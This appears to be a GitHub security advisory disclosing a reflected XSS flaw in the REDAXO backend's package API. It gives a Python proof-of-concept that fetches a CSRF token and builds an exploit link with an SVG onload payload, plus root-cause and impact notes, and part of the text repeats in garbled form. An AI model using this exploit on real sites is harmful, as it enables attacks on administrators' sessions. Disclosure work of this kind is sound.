You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I identified a reflected XSS vulnerability in the REDAXO backend. The function parameter is concatenated into an API error message and rendered without HTML escaping.
Details
Root cause
User input function is injected into an exception message, then rendered by rex_view::error() which delegates to rex_view::message() without HTML escaping.
Propagation: concatenated into the exception message
Sink: rendered via rex_view::error() -> rex_view::message() without escaping
Authentication required: yes (backend session)
PoC - Exploit
#!/usr/bin/env python3importreimporturllib.parseimportrequestsTARGET_URL="http://poc.local/"BACKEND_PATH="redaxo/index.php"# A valid backend PHP session id (must belong to a user who can access the Packages page)SESSION_ID= "xxxxxxxxxxxxxxxxxxxxxhttps://github.com/user-attachments/assets/94093253-abd6-4380-ad46-6b748541a598
"
VERIFY_SSL=FalseTIMEOUT=15PAYLOAD='\\"><svg/onload=alert("Pwned")>'defbuild_backend_url() ->str:
base=TARGET_URL.rstrip('/')
returnf"{base}/{BACKEND_PATH.lstrip('/')}"defextract_api_csrf(html_text: str) ->str:
m=re.search(r'rex-api-call=package[^\"]+_csrf_token=([^&\"\s]+)', html_text)
ifnotm:
raiseRuntimeError("CSRF token for rex_api_call=package was not found in the page HTML.")
returnm.group(1)
defset_session_cookie(session: requests.Session) ->None:
parsed=urllib.parse.urlparse(TARGET_URL)
ifparsed.hostname:
session.cookies.set("PHPSESSID", SESSION_ID, domain=parsed.hostname, path="/")
defmain() ->None:
backend_url=build_backend_url()
s=requests.Session()
set_session_cookie(s)
# Backend session required (role with access to packages)r0=s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL)
if"rex-page-login"inr0.textor"rex_user_login"inr0.text:
print("[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.")
returnr=s.get(backend_url, params={"page": "packages"}, timeout=TIMEOUT, verify=VERIFY_SSL)
ifr.status_code!=200:
print(f"[!] Failed to access packages page (HTTP {r.status_code}).")
returnapi_token=extract_api_csrf(r.text)
params= {
"page": "packages",
"rex-api-call": "package",
"function": PAYLOAD,
"package": "nonexistent",
"_csrf_token": api_token,
}
exploit_url=f"{backend_url}?{urllib.parse.urlencode(params)}"print(exploit_url)
if__name__=="__main__":
main()
To run the PoC you must set a valid admin account PHPSSID. The PoC will then automatically retrieve the CSRF token and generate a ready-to-use exploitation link.
Impact
Confidentiality: Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim’s session.
Integrity: Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call.
Availability: Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios.
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Learn more on MITRE.
Summary
I identified a reflected XSS vulnerability in the REDAXO backend. The
functionparameter is concatenated into an API error message and rendered without HTML escaping.Details
Root cause
User input
functionis injected into an exception message, then rendered byrex_view::error()which delegates torex_view::message()without HTML escaping.Vulnerable code (
redaxo/src/core/lib/packages/api_package.php) :Sink (
redaxo/src/core/lib/view.php) :Source -> sink flow
function(GET)rex_view::error()->rex_view::message()without escapingAuthentication required: yes (backend session)
PoC - Exploit
To run the PoC you must set a valid admin account PHPSSID. The PoC will then automatically retrieve the CSRF token and generate a ready-to-use exploitation link.
Impact
Demo
XSS_1.mp4